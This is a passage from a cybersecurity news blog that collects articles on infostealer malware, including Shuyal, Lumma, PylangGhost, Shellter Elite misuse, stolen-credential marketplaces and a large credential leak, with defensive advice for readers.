The operation was accidentally exposed when the attackers themselves became infected by infostealer malware, revealing credentials, communications, and backend access to their own systems. This breach uncovered evidence of family involvement, with recurring surnames and shared accounts throughout the infrastructure. The group evolved their tactics over time, shifting from install-based tracking in 2020 to download-focused metrics in later years, possibly to evade detection or adapt monetisation methods. 

How to stay safe 

  • Avoid cracked or pirated software; rely on official developer sites and reputable distributors to prevent infostealer exposure at the source. 
  • Keep security suites updated and configure firewalls to block outbound C2 communication, reducing post-compromise impact if malware executes. 
  • Enable multi-factor authentication so stolen credentials are insufficient for account takeovers, and monitor accounts for identity-theft signals.
  • Maintain offline or secure cloud backups for recovery, stay alert to suspicious domain activity, and distrust “free” offers for expensive software that often hide hidden risks.
Read more »
Malware Threat
Browser Credential Theft Cyber Attacks CyberThreat Data Theft Information Security Infostealer Infostealer Malware Malicious Browsers Malware Attack Malware Threat

Shuyal Malware Targets 19 Browsers with Advanced Data Theft and Evasion Capabilities

 

A newly discovered infostealing malware named “Shuyal” has entered the cyber threat landscape, posing a serious risk to users by targeting a wide range of web browsers and deploying sophisticated evasion methods. Identified by researchers at Hybrid Analysis, Shuyal is capable of stealing credentials and sensitive information from 19 different browsers, including lesser-known privacy-focused options like Tor and Brave. 

The malware is named after identifiers found in its code path and represents a new generation of data stealers with expanded surveillance capabilities. Unlike traditional malware that only focuses on login credentials, Shuyal goes deeper—harvesting system-level information, capturing screenshots, monitoring clipboard activity, and sending all of it to cybercriminals using a Telegram bot-controlled infrastructure. 

In his analysis, Vlad Pasca from Hybrid Analysis highlighted that Shuyal performs extensive system reconnaissance. Once it infects a device, it disables the Windows Task Manager to prevent users from detecting or ending the malware’s process. It also hides its tracks by removing evidence of its activities through self-deleting mechanisms, including batch scripts that erase runtime files once the data has been exfiltrated. 

Among the browsers targeted by Shuyal are mainstream options such as Chrome and Edge, but it also compromises more obscure browsers like Waterfox, OperaGx, Comodo, Falko, and others often marketed as safer alternatives. This wide reach makes it particularly concerning for users who believe they are using secure platforms. 

Shuyal collects technical details about the system, including hard drive specifications, connected input devices like keyboards and mice, and display configurations. It compresses all collected data using PowerShell into a temporary folder before transmitting it to the attackers. This organized method of data collection and transfer demonstrates the malware’s highly stealthy design. 

The malware also ensures it remains active on compromised machines by copying itself into the Startup folder, allowing it to launch each time the system is rebooted. 

Although researchers have not yet pinpointed the exact methods attackers use to distribute Shuyal, common delivery vectors for similar malware include phishing emails, malicious social media posts, and deceptive captcha pages. Experts caution that infostealers like Shuyal often serve as precursors to more serious threats, including ransomware attacks and business email compromises. 

Hybrid Analysis encourages cybersecurity professionals to study the published indicators of compromise (IOCs) associated with Shuyal to strengthen their defense strategies. As cyber threats evolve, early detection and proactive protection remain essential.
Read more »
protecting sensitive data
Data Breach Data Sale data security Data Stolen Data Theft Database Leaked Database Security Infostealer Personal Data Personal Information protecting sensitive data

Startup Sells Stolen Personal Data Online for $50, Raising Alarms Over Privacy and Ethics

 

A new controversy is brewing over a U.S.-based startup accused of making stolen personal data widely accessible—for as little as $50. Farnsworth Intelligence, founded by 23-year-old Aidan Raney, is openly marketing a product called “Infostealers,” which allows customers to search a massive database of sensitive information, including passwords, browser autofill data, and private account credentials. 

According to investigative reporting by 404 Media, this information isn’t simply scraped from public directories or legally collected sources. Instead, it appears to come directly from major data breaches—information illegally obtained from hacked websites and platforms. Users can buy access through the company’s online portal, Infostealers.info, raising serious questions about the legality and ethics of such transactions. 

While services like people-search websites have long existed, Farnsworth’s platform seems to go far beyond what’s commonly available. Some of the information for sale includes usernames, passwords, browser history, addresses saved in auto-fill fields, and more—data types typically leaked only after breaches. Their advanced offering, the Infostealer Data Platform, promises even deeper access. Although not available to everyone, it can be granted upon request for uses like journalism, cybersecurity, private investigations, or law enforcement. The company doesn’t appear to require a court order or warrant for access. 

Farnsworth Intelligence makes bold claims about its reach and capabilities. Its website boasts about human intelligence operations and even claims to have infiltrated a North Korean laptop farm via social engineering. It promotes use cases like “corporate due diligence,” “background checks,” and “asset searches,” without clearly explaining how it acquires its “trillions” of data points. The lack of transparency, coupled with the open sale of sensitive data, is alarming. 

Experts argue that while security researchers and cybersecurity firms often monitor breach data to help protect users, monetizing it so brazenly is a different matter entirely. As Cooper Quintin from the Electronic Frontier Foundation notes, “It would be illegal and unethical to sell stolen cell phones even if you didn’t steal them yourself, and I don’t see how this is any different.”  

Even more concerning is the potential for abuse. With no real verification or oversight, bad actors—including stalkers or authoritarian agencies—could exploit this platform to target individuals, especially those already at risk. The implications for personal safety, privacy rights, and digital ethics are profound. 

This development underscores how data breaches don’t just disappear—they become weapons for profit in the wrong hands.
Read more »
Vulnerabilities and Exploits
Business Security Elasticsearch Infostealer Shellter Project Vulnerabilities and Exploits

Attackers Exploit Compromised Shellter Red Team Tool to Deploy Infostealers

 

Shellter Project, which makes a commercial AV/EDR evasion loader for penetration testing, admitted that hackers exploited its Shellter Elite product in assaults after a client leaked a copy of the software.

The exploitation has been ongoing for several months, and despite security researchers detecting the activity in the wild, Shellter has not received notification. The vendor stated that this is the first recorded case of misuse since implementing its stringent license policy in February 2023. 

"We discovered that a company which had recently purchased Shellter Elite licenses had leaked their copy of the software," Shellter noted in a statement. "This breach led to malicious actors exploiting the tool for harmful purposes, including the delivery of infostealer malware.”

Exploitation in the wild 

Security experts (red teams and penetration testers) employ Shellter Elite, a commercial AV/EDR evasion loader, to covertly install payloads inside authentic Windows binaries while avoiding EDR tools during security engagements. In addition to dynamic runtime evasion through AMSI, ETW, anti-debug/VM checks, call stack and module unhooking avoidance, and decoy execution, the product offers static evasion through polymorphism. 

Elastic Security Labs reported on July 3rd that numerous hacking outfits, including Rhadamanthys, Lumma, and Arechclient2, had been utilising Shellter Elite v11.0 to launch infostealers. Elastic researchers discovered that the activity began in at least April, with the distribution mechanism relying on YouTube comments and phishing emails. Based on the unique licensing timestamps, the researchers speculated that the threat actors were utilising a single leaked copy, which Shellter later validated.

Elastic has designed detections for v11.0-based samples, thus payloads created using that version of Shellter Elite are now detectable. Shellter launched Elite version 11.1, which will only be available to authorised clients, excluding the one who leaked the prior version. Elastic Security Labs' lack of contact was deemed "reckless and unprofessional" by the vendor, who criticised Elastic for failing to notify them of their findings earlier. 

"They were aware of the issue for several months but failed to notify us. Instead of collaborating to mitigate the threat, they opted to withhold the information in order to publish a surprise exposé—prioritizing publicity over public safety," Shellter noted. 

However, Elastic gave Shellter the necessary samples to identify the problematic client. The firm apologised to its "loyal customers" and underlined that it does not interact with cybercriminals, stating a willingness to work with law authorities when necessary.
Read more »
PylangGhost
Crypto Scam Infostealer malware North Korean Hackers PylangGhost

North Korean Hackers Target Crypto Professionals With Info-Stealing Malware

 

North Korean hackers are tricking crypto experts into attending elaborate phoney job interviews in order to access their data and install sophisticated malware on their devices. 

Cisco Talos disclosed earlier this week that a new Python-based remote access trojan called "PylangGhost" links malware to a North Korean hacking group dubbed "Famous Chollima," also known as "Wagemole.” "Based on the advertised positions, it is clear that the Famous Chollima is broadly targeting individuals with previous experience in cryptocurrency and blockchain technologies," the researchers explained. 

The effort uses fake employment sites that mimic reputable businesses like Coinbase, Robinhood, and Uniswap to recruit blockchain and crypto experts in India. The scam begins with bogus recruiters guiding job seekers to skill-testing websites, where they submit personal information and answer technical questions. 

Following completion of the assessments, candidates are directed to allow camera access for a video interview, and then urged to copy and execute malicious commands masked as video driver installations. 

Dileep Kumar H V, director of Digital South Trust, told Decrypt that to combat these scams, "India must mandate cybersecurity audits for blockchain firms and monitor fake job portals.” “CERT-In should issue red alerts, while MEITY and NCIIPC must strengthen global coordination on cross-border cybercrime,” he stated, calling for “stronger legal provisions” under the IT Act and “digital awareness campaigns.” 

The recently identified PylangGhost malware has the ability to harvest session cookies and passwords from more than 80 browser extensions, including well-known crypto wallets and password managers like Metamask, 1Password, NordPass, and Phantom. The Trojan runs remote commands from command-and-control servers and gains continuous access to compromised systems. 

This most recent operation fits in with North Korea's larger trend of cybercrime with a crypto focus, which includes the infamous Lazarus Group, which has been involved in some of the biggest heists in the industry. The regime is now focussing on individual professionals to obtain intelligence and possibly infiltrate crypto organisations from within, in addition to stealing money straight from exchanges. 

With campaigns like "Contagious Interview" and "DeceptiveDevelopment," the gang has been launching hiring-based attacks since at least 2023. These attacks have targeted cryptocurrency developers on platforms like GitHub, Upwork, and CryptoJobsList.
Read more »
personal data leak
Data Breach Data Leak data security Data stealing malware Database Breach Infostealer Infostealer Malware Login Credentials Login Security Malware attacks personal data leak

Massive Data Leak Exposes 16 Billion Login Records from Major Online Services

 

A recent investigation by Cybernews has uncovered a staggering 30 separate online datasets containing approximately 16 billion stolen login credentials from services including Apple, Google, and Facebook. These data dumps, discovered through open sources, appear to be the result of large-scale malware attacks that harvested user information through infostealers. 

Each dataset contains a URL alongside usernames and passwords, suggesting that malicious software was used to collect login details from infected devices. While some overlap exists among the records, the overall size and spread of the leak make it difficult to determine how many unique users have been compromised. 

Except for one dataset previously identified by cybersecurity researcher Jeremiah Fowler—which included over 185 million unique credentials—most of the remaining 29 databases had not been publicly reported before. These leaked collections are often only temporarily available online before being removed, but new compilations are regularly uploaded, often every few weeks, with fresh data that could be weaponized by cybercriminals. The exact sources and individuals behind these leaks remain unknown. 

To avoid falling victim to similar malware attacks, experts advise staying away from third-party download platforms, especially when obtaining software for macOS. Users are encouraged to download apps directly from the Mac App Store or, if not available there, from a developer’s official website. Using cracked or pirated software significantly increases the risk of malware infection. 

Phishing scams remain another common threat vector. Users should be cautious about clicking on links in unsolicited emails or messages. Even if a message appears to come from a trusted company, it’s vital to verify the sender’s address and inspect URLs carefully. You can do this by copying the link and pasting it into a text editor to see its actual destination before clicking. 

To reduce the chance of visiting malicious sites, double-check the spelling of URLs typed manually and consider bookmarking commonly used sites. Alternatively, using a search engine and clicking on verified results can reduce the risk of visiting typo-squatting domains. 

If you suspect your credentials may have been compromised, take immediate action. Start by updating passwords on any affected services and enabling two-factor authentication for added security. It’s also wise to check your financial statements for unauthorized activity and consider placing a freeze on your credit file to prevent fraudulent account openings. 

Additionally, tools like Have I Been Pwned can help verify if your email address has been part of a known breach. Always install the latest system and app updates, as they often include crucial security patches. Staying current with updates is a simple but effective defense against vulnerabilities and threats.
Read more »
Stolen Credentials
Cyber Crime Data Theft Infostealer Russian Market Stolen Credentials

Russian Market Sells Millions of Stolen Credentials

 

The "Russian Market" cybercrime marketplace has developed as one of the most popular places for purchasing and selling credentials stolen by info stealer malware. Although the marketplace has been functioning for almost six years and has grown in popularity by 2022, ReliaQuest believes that the Russian market has lately reached new heights.

Part of this spike in popularity can be attributed to the Genesis Market's demise, which left a significant gap in the market. Although the bulk (85%) of credentials provided on the Russian Market are "recycled" from existing sources, it has attracted enormous cybercrime audiences due to its diverse range of commodities for sale and the availability of logs for as little as $2. 

An infostealer log is typically a text file (or numerous files) written by infostealer malware that contains account passwords, session cookies, credit card data, cryptocurrency wallet data, and system profiling data obtained from an infected device. 

Each log includes dozens or even thousands of credentials, bringing the total amount of stolen credentials to hundreds of millions or more. Once captured, the logs are sent to an attacker's server, where they are stored for future nefarious action or sold on marketplaces such as Russian Market. 

Infostealers have become a common tactic for attackers, with numerous campaigns now aimed at the enterprise to steal session cookies and corporate credentials. According to ReliaQuest, this is evident in the Russian market, where 61% of stolen logs include SaaS credentials from platforms such as Google Workspace, Zoom, and Salesforce. Additionally, 77% of the logs had SSO (Single Sign-On) credentials.

Lumma stumbles, Acreed rises

ReliaQuest analysed over 1.6 million posts on the Russian market to chart the growth and decrease in popularity of specific info theft malware. Until recently, Lumma stole the majority of logs, accounting for 92% of all credentials sold on the Russian market. 

Lumma ruled the market when Raccoon Stealer collapsed due to law enforcement action. Lumma may face the same fate, as its operations were recently stopped by a global law enforcement operation that resulted in the seizure of 2,300 domain names.

The long-term outcomes of this operation are unknown, but Check Point said that Lumma's creators are already working to rebuild and resume their cybercrime operations. 

Meanwhile, ReliaQuests reports a significant spike in popularity of a new infostealer named Acreed, which is quickly gaining traction following Lumma's elimination. Acreed's rapid rise in the Russian market is evidenced by the over 4,000 logs submitted in its first week of operation, according to Webz. 

Acreed is similar to a conventional info-stealer in that it targets data stored in Chrome, Firefox, and their derivatives, such as passwords, cookies, cryptocurrency wallets, and credit card information. 

Phishing emails, "ClickFix" attacks, premium software malvertising, and YouTube or TikTok videos are all used by info-stealers to infect consumers. To avoid this broad risk, it is recommended that you be vigilant and use good software download habits.
Read more »
takedown
CloudFlare Cybersecurity DOJ Europol FBI Infostealer Lumma malware Microsoft takedown

Global Operation Dismantles Lumma Malware Network, Seizes 2,300 Domains and Infrastructure

 

In a sweeping international crackdown earlier this month, a collaborative operation involving major tech firms and law enforcement agencies significantly disrupted the Lumma malware-as-a-service (MaaS) operation. This effort resulted in the seizure of thousands of domains and dismantling of key components of Lumma's infrastructure across the globe.

A major milestone in the operation occurred on May 13, 2025, when Microsoft, through legal action, successfully took control of around 2,300 domains associated with the malware. Simultaneously, the U.S. Department of Justice (DOJ) dismantled online marketplaces used by cybercriminals to rent Lumma’s services, while Europol’s European Cybercrime Center (EC3) and Japan’s Cybercrime Control Center (JC3) helped take down Lumma’s infrastructure in their respective regions.

"Between March 16, 2025, and May 16, 2025, Microsoft identified over 394,000 Windows computers globally infected by the Lumma malware. Working with law enforcement and industry partners, we have severed communications between the malicious tool and victims," said Steven Masada, Assistant General Counsel of Microsoft's Digital Crimes Unit.

Cloudflare, one of the key players in the effort, highlighted the impact of the takedown.

“The Lumma Stealer disruption effort denies the Lumma operators access to their control panel, marketplace of stolen data, and the Internet infrastructure used to facilitate the collection and management of that data. These actions impose operational and financial costs on both the Lumma operators and their customers, forcing them to rebuild their services on alternative infrastructure,” Cloudflare stated.

The operation saw contributions from companies like ESET, CleanDNS, Bitsight, Lumen, GMO Registry, and law firm Orrick. According to Cloudflare, the Lumma malware misused their platform to mask server IP addresses that were used to siphon off stolen credentials and sensitive data.

Even after suspending malicious domains, the malware managed to bypass Cloudflare’s interstitial warning page, prompting the company to reinforce its security measures.

"Cloudflare's Trust and Safety team repeatedly flagged domains used by the criminals and suspended their accounts," the company explained.

“In February 2025, Lumma’s malware was observed bypassing Cloudflare’s interstitial warning page, which is one countermeasure that Cloudflare employs to disrupt malicious actors. In response, Cloudflare added the Turnstile service to the interstitial warning page, so the malware could not bypass it." 

Also known as LummaC2, Lumma is a sophisticated information-stealing malware offered as a subscription-based service, ranging from $250 to $1,000. It targets both Windows and macOS systems, enabling cybercriminals to exfiltrate data from browsers and apps.

Once installed, Lumma can extract a broad range of data, including login credentials, credit card numbers, cryptocurrency wallets, cookies, and browsing history from popular browsers like Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based platforms. The stolen data is packaged and sent to attacker-controlled servers, where it is either sold on dark web marketplaces or used in follow-up cyberattacks.

Initially spotted in December 2022 on cybercrime forums, the malware quickly gained traction. Cybersecurity firm KELA reported its rapid rise in popularity among cybercriminals.

IBM X-Force’s 2025 threat intelligence report revealed a 12% year-on-year increase in the number of stolen credentials being sold online, largely driven by the use of infostealers like Lumma. Phishing campaigns delivering such malware have surged by 84%, making Lumma the most dominant player in this threat landscape.

Lumma has been linked to major malvertising campaigns affecting hundreds of thousands of users and has been used by notorious groups such as the Scattered Spider cybercrime collective.

Recently, stolen data linked to Lumma has played a role in high-profile breaches at companies like PowerSchool, HotTopic, CircleCI, and Snowflake. In some cases, infostealer malware has been used to manipulate internet infrastructure, such as the Orange Spain RIPE account hijacking incident that disrupted BGP and RPKI configurations.

On the day of the crackdown, the FBI and CISA jointly issued a security advisory outlining indicators of compromise (IOCs) and detailing the tactics, techniques, and procedures (TTPs) employed by threat actors using Lumma malware.


Read more »
Subscribe to: Posts (Atom)